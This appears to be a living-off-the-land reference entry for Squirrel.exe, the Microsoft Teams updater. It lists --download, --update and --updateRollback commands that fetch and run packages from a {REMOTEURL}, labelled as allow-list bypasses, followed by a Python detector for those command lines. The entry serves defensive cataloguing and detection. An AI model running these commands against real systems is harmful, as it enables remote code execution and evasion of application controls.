Squirrel.exe
Binary used to update an installed NuGet/Squirrel package. Part of the Microsoft Teams installation.
Paths
C:\Users\<username>\AppData\Local\Microsoft\Teams\current\Squirrel.exe
Commands
Download
Squirrel.exe contacts the given URL, looks for a RELEASES file there, and downloads the NuGet package.
Use case: Download binary
Privileges: User
squirrel.exe --download {REMOTEURL}
AWL Bypass
Squirrel.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.
Use case: Download and execute binary
Privileges: User
squirrel.exe --update {REMOTEURL}
Execute
Squirrel.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.
Use case: Download and execute binary
Privileges: User
squirrel.exe --update {REMOTEURL}
AWL Bypass
Squirrel.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.
Use case: Download and execute binary
Privileges: User
squirrel.exe --updateRollback={REMOTEURL}
Execute
Squirrel.exe contacts the given URL, looks for a RELEASES file there, then downloads and installs the NuGet package.
Use case: Download and execute binary
Privileges: User
squirrel.exe --updateRollback={REMOTEURL}
Detection
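Added example, not part of the original entry or of any vendor rule: one way to flag the command lines listed above in process-creation logs. The sample command lines, the ALLOWED_HOSTS placeholder and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Switches listed on this page that make Squirrel.exe fetch from a URL.
FLAGS = {"--download": "download",
         "--update": "download+execute",
         "--updaterollback": "download+execute"}
# Assumption: hosts your environment expects updates from (placeholder value).
ALLOWED_HOSTS = frozenset({"updates.example.com"})

# Constructed process-creation command lines, not real telemetry.
SAMPLES = [
    r'"C:\Users\alice\AppData\Local\Microsoft\Teams\current\Squirrel.exe" --update http://198.51.100.7/pkg',
    r'squirrel.exe --updateRollback="https://files.example.net/app"',
    r'Squirrel.exe --download https://updates.example.com/teams',
    r'notepad.exe --update http://198.51.100.7/pkg',
]

def inspect(cmdline, allowed_hosts=ALLOWED_HOSTS):
    """Return a finding for a Squirrel.exe fetch from an unexpected host, else None."""
    # Keep a quoted image path together; other tokens split on whitespace.
    argv = re.findall(r'"[^"]*"|\S+', cmdline)
    if not argv:
        return None
    image = argv[0].strip('"')
    if not re.search(r'(^|[\\/])squirrel\.exe$', image, re.I):
        return None
    for i, arg in enumerate(argv[1:], start=1):
        name, sep, value = arg.partition("=")
        action = FLAGS.get(name.lower())
        if action is None:
            continue
        if not sep:  # "--flag URL" form: the URL is the next token
            value = argv[i + 1] if i + 1 < len(argv) else ""
        value = value.strip('"')
        parsed = urlparse(value)
        host = (parsed.hostname or "").lower()
        if parsed.scheme in ("http", "https") and host not in allowed_hosts:
            return {"flag": name, "action": action, "url": value, "host": host}
    return None

def scan(cmdlines):
    """Inspect each command line and return only the findings."""
    return [f for f in map(inspect, cmdlines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

Matching on the image name alone misses renamed copies of the binary, so pair it with the original-filename metadata if your event source records it.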
Resources
- https://www.youtube.com/watch?v=rOP3hnkj7ls
- https://twitter.com/reegun21/status/1144182772623269889
- http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
- https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
- https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56